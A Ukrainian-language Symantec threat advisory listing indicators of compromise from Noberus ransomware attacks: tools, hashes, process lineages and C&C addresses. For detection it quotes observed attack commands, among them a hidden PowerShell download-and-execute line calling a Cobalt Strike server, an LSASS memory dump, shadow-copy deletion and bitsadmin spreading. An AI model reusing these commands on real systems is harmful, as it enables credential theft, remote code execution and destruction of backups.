Попередження

про загрозу

TLP: Amber

Noberus: Індикатори компрометації з нещодавніх атак

Зловмисники використовують PCHunter та SystemBC, а також низку інших
інструментів перед розгортанням програм-вимагачів.

Виконавець: Цільові сектори:

Coreid Усі

Мотивація атаки:
Псевдоніми виконавця:

Ransomware
Carbon Spider, FIN7

Цільові географічні регіони:

Усі

Огляд

Нещодавні атаки з використанням вірусу-вимагача Noberus показали, що зловмисники використовували великий набір
інструментів перед розгортанням корисного навантаження. Використовувалися різні інструменти для збору облікових даних,
зокрема Mimikatz, ProcDump і Net-GPPPassword.

Крім того, у якості інструменту зловмисники використовували нібито легітимний інструмент PCHunter, імовірно для знищення
процесів. Також було використано програму PowerTool, яка рекламується як anti-rootkit, але широко використовується для
відключення програм безпеки.

Зловмисники також застосовували SystemBC, добре відомий троян віддаленого доступу (RAT), який часто зустрічається в
розслідуваннях випадків вимагання. Хоча спочатку він був розроблений як RAT, у наші дні зловмисники використовують його
виключно як проксі-інструмент.

Інструменти, що використовуються:

Ransom.Noberus

AdFind: Загальнодоступний інструмент, який використовується для запиту Active Directory. Він має законне
застосування, але широко використовується зловмисниками для створення карти мережі.

BITSAdmin: Інструмент Microsoft, який можна використовувати для створення завдань на завантаження або
вивантаження і відстеження їх виконання.

Експлойт для CVE-2020-0787

Квітень 25, 2023

Mimikatz: Загальнодоступний інструмент для скидання облікових даних.

Net-GPPPassword: Загальнодоступний інструмент, що дає змогу скидати паролі.

PCHunter: Загальнодоступний інструмент, який можна використовувати для перегляду та завершення процесів.

PowerShell: Інструмент створення сценаріїв Microsoft, який можна використовувати для виконання команд, завантаження
корисного навантаження, обходу зламаних мереж і проведення розвідки.

PowerTool: Загальнодоступний інструмент для видалення руткітів, який можна використовувати для відключення захисного
програмного забезпечення.

ProcDump: Інструмент Microsoft Sysinternals для моніторингу програми на предмет стрибків процесора та створення дампів
збоїв, який також можна використовувати як загальну утиліту для створення дампів процесів.

Rubeus: Загальнодоступний набір інструментів для зловживання Kerberos.

Sharphound: Компонент збору даних для загальнодоступного інструменту тестування на проникнення Bloodhound.

SystemBC: Шкідлива програма, яка може відкрити бекдор на зараженому комп'ютері та використовувати проксі-протокол
SOCKS5 для зв'язку з командно-контрольним (C&C) сервером.

VssAdmin: Інструмент командного рядка Windows, який використовується для управління тіньовими копіями томів. Він може
використовуватися зловмисниками для видалення тіньових копій та/або зміни розміру виділеного простору. Зміна розміру може
обмежити простір, виділений для тіньових копій тому, що може перешкоджати створенню нових копій.

WinRAR: Менеджер архівів, який може використовуватися для архівування або zip-архівування файлів – наприклад, перед
ексфільтрацією.

.Індикатори компрометації:
Аналітики SOC повинні переглянути це попередження та пошукати у своїй мережі відповідні індикатори компрометації (IOC). Їх
наявність може вказувати на цілеспрямовану атаку, що готується. Якщо IOC є шкідливим, і файл доступний для нас, продукти
Symantec Endpoint виявлять і заблокують цей файл. Якщо під час аналізу ви виявите інші невідомі або недоступні файли, ви
можете надіслати їх до Symantec для аналізу.

Продукти Symantec будуть виявляти та попереджати про поведінку та методи, докладно описані в цьому попередженні. Щоб
отримати вказівки щодо пошуку IOC за допомогою EDR Symantec, прочитайте цей посібник для хмарного рішення або цей
посібник для рішення On-Prem.

SHA256 file hash: 2447f916b3a4e23bc5b08177a1744e89f921c2943695eac109e3fc84595b33b7

Description: Ransom.Noberus

File name: xxx.exe

First Seen: 03-26-2023

Process lineages: cmd.exe <- explorer.exe <- svchost.exe <- services.exe <- wininit.exe

cmd.exe <- explorer.exe <- svchost.exe <- services.exe <- wininit.exe

vssadmin.exe <- cmd.exe <- xxx.exe <- cmd.exe <- explorer.exe <- svchost.exe <- services.exe <- wininit.exe
Commands: "CSIDL_SYSTEM_DRIVE\perflogs\xxx.exe" 2vflH1ZvHW5Rqk -tXEsr4rxbkrg -Q -1MqQTnXlck87BC -p
[REMOVED]

xxx.exe 2vflH1ZvHW5Rqk -tXEsr4rxbkrg -Q -1MqQTnXlck87BC –v

vssadmin.exe Delete Shadows /all /quiet

SHA256 file hash: N/A

Description: Suspected Cobalt download via PowerShell

File name: powershell.exe

Process lineage: explorer.exe <- userinit.exe <- winlogon.exe <- smss.exe <- smss.exe

Commands: "CSIDL_SYSTEM\windowspowershell\v1.0\powershell.exe" -noexit -command Set-Location -literalPath

'CSIDL_PROFILE\downloads'

"CSIDL_SYSTEM\windowspowershell\v1.0\powershell.exe" "CSIDL_SYSTEM\windowspowershell\v1.0\powershell.exe" -
nop -w hidden -c "IEX ((new-object net.webclient).downloadstring('hxxp://179.60.146[.]6:80/asdfg'))"

"CSIDL_SYSTEM\windowspowershell\v1.0\powershell.exe" -noexit -command Set-Location -literalPath

'CSIDL_SYSTEM_DRIVE\perflogs'

SHA256 file hash: 094d1476331d6f693f1d546b53f1c1a42863e6cde014e2ed655f3cbe63e5ecde

Description: PowerTool

File name: pt.exe

SHA256 file hash: 5ee7ef6d04d5c624e17ca959af3495555ab94ef872adc0b9eb4bf6ba95e189be

Description: PowerTool

File name: pto.exe

Process lineages: explorer.exe <- userinit.exe <- winlogon.exe <- smss.exe <- smss.exe

Commands: "CSIDL_SYSTEM_DRIVE\perflogs\pto.exe"

SHA256 file hash: 05732e84de58a3cc142535431b3aa04efbe034cc96e837f93c360a6387d8faad

Description: ProcDump

File name: procdump.exe

Process lineage: powershell.exe <- explorer.exe <- userinit.exe <- winlogon.exe <- smss.exe <- smss.exe
Commands: "CSIDL_SYSTEM_DRIVE\perflogs\procdump.exe" -accepteula -ma lsass
CSIDL_SYSTEM_DRIVE\perflogs\lsass.dmp

SHA256 file hash: 51d04db63dc7428e28a864f899693ff2f7b062ef711a7f7e4e0d44c0111f81c7

Description: WinRAR

File name: winrar.exe

Process lineage: explorer.exe <- svchost.exe <- services.exe <- wininit.exe

Commands: "CSIDL_SYSTEM_DRIVE\program files\winrar\winrar.exe" x -iext -ow -ver --

"CSIDL_SYSTEM_DRIVE\perflogs\pchunter64.zip" CSIDL_SYSTEM_DRIVE\perflogs

SHA256 file hash: 2b214bddaab130c274de6204af6dba5aeec7433da99aa950022fa306421a6d32

Description: PCHunter

File name: pchunter64.exe

Process lineage: explorer.exe <- userinit.exe <- winlogon.exe <- smss.exe <- smss.exe

Commands: "CSIDL_SYSTEM_DRIVE\perflogs\pchunter64.exe"

SHA256 file hash: d1aa0ceb01cca76a88f9ee0c5817d24e7a15ad40768430373ae3009a619e2691

Description: PCHunter

File name: pchunter64.exe

Process lineage: explorer.exe <- svchost.exe <- services.exe <- wininit.exe

Commands: "CSIDL_SYSTEM_DRIVE\perflogs\pchunter64.exe"

SHA256 file hash: 1e7737a57552b0b32356f5e54dd84a9ae85bb3acff05ef5d52aabaa996282dfb

Description: AdFind batch file

File name: adf.bat

SHA256 file hash: c2ebcc389304539bc13c3d2023cf88f9ea0bac7210fefa03f8333eaab0bbb76d

Description: AdFind batch file

File name: ad.bat

SHA256 file hash: 842737b5c36f624c9420a005239b04876990a2c4011db87fe67504fa09281031

Description: AdFind

File name: adfind.exe

SHA256 file hash: 92804faaab2175dc501d73e814663058c78c0a042675a8937266357bcfb96c50

Description: Mimikatz

File name: mimkatz.exe

SHA256 file hash: 4b61b27ad8855fb66aaeacc0c232cbc9fc34152ad14ec73665aa46fce7b8a614

Description: SystemBC

File name: socks64.dll

SHA256 file hash: 93e6fe87eb19a92e6def570f054d9166802c418cf38574829142bd055acf47e5

Description: SystemBC

File name: socks32.dll

SHA256 file hash: 67be2a5e7b30a949b42a7306b7c2cd139da4133a2ec0c0afdb59218f4649130a

Description: SystemBC

File name: socks64.dll

Process lineage: rundll32.exe <- powershell.exe <- explorer.exe <- svchost.exe <- services.exe <- wininit.exe

SHA256 file hash: 926fcb9483faa39dd93c8442e43af9285844a1fbbe493f3e4731bbbaecffb732

Description: SystemBC

File name: socks32.dll

Process lineage: rundll32.exe <- powershell.exe <- explorer.exe <- svchost.exe <- services.exe <- wininit.exe

SHA256 file hash: N/A

Description: Spreading ransomware via BITSAdmin

Process lineage: cmd.exe <- wmiprvse.exe <- svchost.exe <- services.exe <- wininit.exe

Commands: cmd.exe /c bitsadmin /transfer xxx \\[REMOVED]\share$\xxx.exe

CSIDL_PROFILE\[REMOVED]\appdata\roaming\xxx.exe&c:\users\[REMOVED]\appdata\roaming\xxx.exe GGNHlkl -
Jz4PNZC -3sWG6rD -zEZODY -9ZTPw0CCnZ -v -bH –Npy

bitsadmin /transfer xxx \\[REMOVED]\share$\xxx.exe CSIDL_PROFILE\[REMOVED]\appdata\roaming\xxx.exe

SHA256 file hash: ff5e7e7c8a82b92328376ef23ff0a2c6506c0876702a3dd9869878f886567741

Description: Exploit for CVE-2020-0787

File name: runsys.exe

SHA256 file hash: 4c0571b257ff17a3f79b9ac5dedc967fb2d0c9a44091ca3afdb872d028a9bb67

Description: Net-GPPPassword

File name: net-gpppassword.exe

SHA256 file hash: dee933e8c104e9cdcbc63b10490dc94b04cef3029de8d80bf61ece90f7ef7006

Description: Net-GPPPassword

File name: get-gpppasswordmod.ps1

SHA256 file hash: 732f242c91076d01973b283630b9ec406dd6961a1d9298bde177b6e96efb029f

Description: Net-GPPPassword

File name: get-gpppassword.ps1

SHA256 file hash: d728113ddba63d4eb5b5cb1695f5810ddd29c1e7ca891395dd5b2a25cece86aa

Description: Rubeus

File name: invoke-rubeus.ps1

SHA256 file hash: a7240d8a7aee872c08b915a58976a1ddee2ff5a8a679f78ec1c7cf528f40deed

Description: Sharphound
File name: sharphound.exe

Network Indicator: hxxp://powersupportplan[.]com/files/templates.gif

Description: Cobalt Strike C&C

Network Indicator: hxxp://179.60.146[.]6:80/asdfg

Description: Cobalt Strike C&C

File hashes, simplified list:

05732e84de58a3cc142535431b3aa04efbe034cc96e837f93c360a6387d8faad

094d1476331d6f693f1d546b53f1c1a42863e6cde014e2ed655f3cbe63e5ecde

1e7737a57552b0b32356f5e54dd84a9ae85bb3acff05ef5d52aabaa996282dfb

2447f916b3a4e23bc5b08177a1744e89f921c2943695eac109e3fc84595b33b7

2b214bddaab130c274de6204af6dba5aeec7433da99aa950022fa306421a6d32

4b61b27ad8855fb66aaeacc0c232cbc9fc34152ad14ec73665aa46fce7b8a614

4c0571b257ff17a3f79b9ac5dedc967fb2d0c9a44091ca3afdb872d028a9bb67

51d04db63dc7428e28a864f899693ff2f7b062ef711a7f7e4e0d44c0111f81c7

5ee7ef6d04d5c624e17ca959af3495555ab94ef872adc0b9eb4bf6ba95e189be

67be2a5e7b30a949b42a7306b7c2cd139da4133a2ec0c0afdb59218f4649130a

732f242c91076d01973b283630b9ec406dd6961a1d9298bde177b6e96efb029f

842737b5c36f624c9420a005239b04876990a2c4011db87fe67504fa09281031

926fcb9483faa39dd93c8442e43af9285844a1fbbe493f3e4731bbbaecffb732

92804faaab2175dc501d73e814663058c78c0a042675a8937266357bcfb96c50

93e6fe87eb19a92e6def570f054d9166802c418cf38574829142bd055acf47e5

a7240d8a7aee872c08b915a58976a1ddee2ff5a8a679f78ec1c7cf528f40deed

c2ebcc389304539bc13c3d2023cf88f9ea0bac7210fefa03f8333eaab0bbb76d

d1aa0ceb01cca76a88f9ee0c5817d24e7a15ad40768430373ae3009a619e2691

d728113ddba63d4eb5b5cb1695f5810ddd29c1e7ca891395dd5b2a25cece86aa

dee933e8c104e9cdcbc63b10490dc94b04cef3029de8d80bf61ece90f7ef7006
ff5e7e7c8a82b92328376ef23ff0a2c6506c0876702a3dd9869878f886567741

File names, simplified list:

ad.bat

adf.bat

adfind.exe

get-gpppasswordmod.ps1

invoke-rubeus.ps1

mimkatz.exe

net-gpppassword.exe

pchunter64.exe

procdump.exe

pt.exe

pto.exe

runsys.exe

sharphound.exe

socks32.dll

socks64.dll

winrar.exe

xxx.exe

Network indicators, simplified list:

hxxp://powersupportplan[.]com/files/templates.gif

hxxp://179.60.146[.]6:80/asdfgd
Copyright © 2023 Broadcom. All Rights Reserved. The term “Broadcom” refers to Broadcom Inc. and/or its
subsidiaries. For more information, go to www.broadcom.com. All trademarks, trade names, service marks, and logos
referenced herein belong to their respective companies.
Broadcom reserves the right to make changes without further notice to any products or data herein to improve
reliability, function, or design. Information furnished by Broadcom is believed to be accurate and reliable. However,
Broadcom does not assume any liability arising out of the application or use of this information, nor the application or
use of any product or circuit described herein, neither does it convey any license under its patent rights nor the rights of
others.